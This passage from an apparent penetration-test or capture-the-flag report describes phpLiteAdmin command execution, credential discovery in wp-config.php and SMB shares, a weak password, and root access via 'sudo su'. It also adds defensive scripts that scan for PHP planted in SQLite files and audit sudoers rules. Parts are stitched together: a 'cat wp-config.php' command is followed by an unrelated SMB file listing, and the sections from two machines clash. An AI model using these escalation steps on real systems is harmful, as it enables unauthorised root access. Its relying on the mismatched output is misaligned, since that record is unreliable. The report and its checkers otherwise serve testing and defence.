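    """Return sorted (relative_path, reasons) for suspicious SQLite files under root."""
    root, findings = Path(root), []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        data = path.read_bytes()
        if not data.startswith(SQLITE_MAGIC):   # plain PHP/HTML files are out of scope here
            continue
        reasons = []
        if path.suffix.lower() in PHP_EXTENSIONS:
            reasons.append("sqlite file with a PHP extension")
        if PHP_OPEN_TAG.search(data):           # CREATE TABLE text is stored verbatim in the file
            reasons.append("PHP open tag stored inside the database")
        if reasons:
            findings.append((path.relative_to(root).as_posix(), reasons))
    return sorted(findings)

def _make_db(path, ddl):
    con = sqlite3.connect(path)
    con.execute(ddl)
    con.commit()
    con.close()

def build_sample_webroot(base):
    """Constructed fixture: a benign database, an abused one and an ordinary PHP file."""
    dbadmin = Path(base) / "dbadmin"
    dbadmin.mkdir(parents=True, exist_ok=True)
    _make_db(dbadmin / "site.db", "CREATE TABLE products (name TEXT DEFAULT 'none')")
    _make_db(dbadmin / "hack.php", "CREATE TABLE t (e TEXT DEFAULT '<?php echo 1 ?>')")
    (Path(base) / "view.php").write_text("<?php echo 'normal script' ?>")  # not SQLite

def demo():
    """Build the fixture in a temporary directory, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_webroot(tmp)
        return scan_sqlite_for_php(tmp)
```

Run it against a real web root with `scan_sqlite_for_php("/var/www")`; a hit on a file whose name ends in `.php` is the signature of the database-rename step shown in the screenshot above.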

##### Severity

`High` - An attacker with connectivity to the machine may guess the credentials for `phpLiteAdmin` and use the known vulnerability in this version to gain command execution on the machine.

##### Remediation

- Change the default password for `phpLiteAdmin`.
- Limit access to the database where possible.

##### Proof

![9803287060e167bedf64c355ce888f98.png](_resources/d77016f6a7eb4770a8c82f92392d9ef7.png)

#### Privilege Escalation

##### Vulnerability exploitation

As `www-data` we have read access to most of Zico's home folder. It looks like he is experimenting with several content management systems.

```
www-data@zico:/home/zico$ ls -la
ls -la
total 9244
drwxr-xr-x 6 zico zico 4096 Jun 19 2017 .
drwxr-xr-x 3 root root 4096 Jun 8 2017 ..
-rw------- 1 zico zico 912 Jun 19 2017 .bash_history
-rw-r--r-- 1 zico zico 220 Jun 8 2017 .bash_logout
-rw-r--r-- 1 zico zico 3486 Jun 8 2017 .bashrc
-rw-r--r-- 1 zico zico 675 Jun 8 2017 .profile
drw------- 2 zico zico 4096 Jun 8 2017 .ssh
-rw------- 1 zico zico 3509 Jun 19 2017 .viminfo
-rw-rw-r-- 1 zico zico 504646 Jun 14 2017 bootstrap.zip
drwxrwxr-x 18 zico zico 4096 Jun 19 2017 joomla
drwxrwxr-x 6 zico zico 4096 Aug 19 2016 startbootstrap-business-casual-gh-pages
-rw-rw-r-- 1 zico zico 61 Jun 19 2017 to_do.txt
drwxr-xr-x 5 zico zico 4096 Jun 19 2017 wordpress
-rw-rw-r-- 1 zico zico 8901913 Jun 19 2017 wordpress-4.8.zip
-rw-rw-r-- 1 zico zico 1194 Jun 8 2017 zico-history.tar.gz
```

Inspecting the files, we find database credentials in `wp-config.php` in the WordPress directory.

```
$ cat wp-config.php
```

```plaintext
dir
. D 0 Tue Aug 15 07:05:52 2017
.. D 0 Mon Aug 14 08:34:47 2017
wordpress D 0 Tue Aug 15 07:21:08 2017
Backnode_files D 0 Mon Aug 14 08:08:26 2017
wp D 0 Tue Aug 15 06:51:23 2017
deets.txt N 139 Mon Aug 14 08:20:05 2017
robots.txt N 92 Mon Aug 14 08:36:14 2017
todolist.txt N 79 Mon Aug 14 08:39:56 2017
apache D 0 Mon Aug 14 08:35:19 2017
index.html N 36072 Sun Aug 6 01:02:15 2017
info.php N 20 Tue Aug 15 06:55:19 2017
test D 0 Mon Aug 14 08:35:10 2017
old D 0 Mon Aug 14 08:35:13 2017

3029776 blocks of size 1024. 1404884 blocks available
```

Nice, we have a listing of the files hosted on the web server. Very interesting! Unfortunately, we cannot upload a webshell through `put`, but we can pull interesting files and inspect them. The file `deets.txt` contains a password of `12345`, but we're not sure which account it belongs to. Further, we get some database credentials from the WordPress configuration.

```php
# cat wp-config.php
```

Since we gained shell access at this point, I did not look at the open IRC port any further.

##### Severity

`Critical` - Anyone with connectivity to the target machine can gain access to sensitive files through the exposed share, and potentially guess or brute-force the weak credentials to gain SSH access to the machine.

##### Remediation

- Choose stronger passwords for services, especially externally exposed services such as SSH.
- Limit (database) account privileges according to least privilege.
- Limit network access to SSH and MySQL if remote access to these ports is not required.

##### Proof

![79550bc5070dbaccbc95e0795d41a50f.png](_resources/4a37b0a8091645d7a6b5ebfb1b94710b.png)

#### Privilege Escalation

##### Vulnerability exploitation

From the last screenshot (`id`), we notice we are in the `sudo` group.
Running `sudo -l` and entering the password `12345` shows us that we can run *all* commands as root, which means we can trivially escalate our privileges by running `sudo su`!

##### Severity

`High` - Anyone with access to the `sudo` group or similar privileges in the `sudoers` file can trivially gain full control over the system.

##### Remediation

Limit `sudo` privileges on a least-privilege basis.

##### Proof

![6b320de16f8019995f35475af9004dd2.png](_resources/e6f2888300044268a027062aa4973311.png)
--------------------------------------------------------------------------------
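Both privilege escalations in this report come down to over-broad sudo rules: `ALL` for the `sudo` group on one machine, and `tar`, which can spawn a shell, for a single user on the other. The checker below is an added example and not part of the original report; it parses a constructed sudoers fragment and flags rules that grant an unrestricted command set or a shell-capable program. The sample text and the `SHELL_CAPABLE` set are assumptions for the example and only name programs that appear in the report.

```python
"""Audit sudoers rules for grants that amount to full root (added example, not from
the report). Both escalations above rest on over-broad sudo rights: ALL for the
sudo group, and tar, which can spawn a shell, for one user. The sudoers text and
the set of shell-capable programs are constructed here and name only programs
that appear in the report; extend the set from your own baseline."""
import posixpath
import re

# who  host=(runas)  TAG:  command list   (sudoers User_Spec line, simplified)
RULE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$")
TAG = re.compile(r"^(?P<tag>[A-Z_]+):\s*")
SHELL_CAPABLE = {"tar", "su", "bash", "sh"}

def audit_sudoers(text):
    """Return (who, command, reason) for every rule that hands out root-equivalent access."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()         # drop comments and #include lines
        m = RULE.match(line)
        if not m or line.startswith("Defaults") or m["who"] == "root":
            continue
        rest, tags = m["rest"], []
        while (t := TAG.match(rest)):                # peel NOPASSWD:, SETENV:, ...
            tags.append(t["tag"])
            rest = rest[t.end():]
        suffix = " without a password" if "NOPASSWD" in tags else ""
        for cmd in (c.strip() for c in rest.split(",")):
            if not cmd:
                continue
            prog = posixpath.basename(cmd.split()[0])
            if prog == "ALL":
                findings.append((m["who"], cmd, "unrestricted command set" + suffix))
            elif prog in SHELL_CAPABLE:
                findings.append((m["who"], cmd, prog + " can spawn a root shell" + suffix))
    return findings

SAMPLE_SUDOERS = """\
# constructed sample sudoers, not taken from either target
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
zico    ALL=(root) NOPASSWD: /bin/tar
deploy  ALL=(root) /usr/bin/systemctl restart apache2, /usr/bin/systemctl reload apache2
"""
```

Feeding the output of `sudo -l` is not equivalent, since that lists only the caller's own rules; run the checker over `/etc/sudoers` and `/etc/sudoers.d/*` as root to audit every grant.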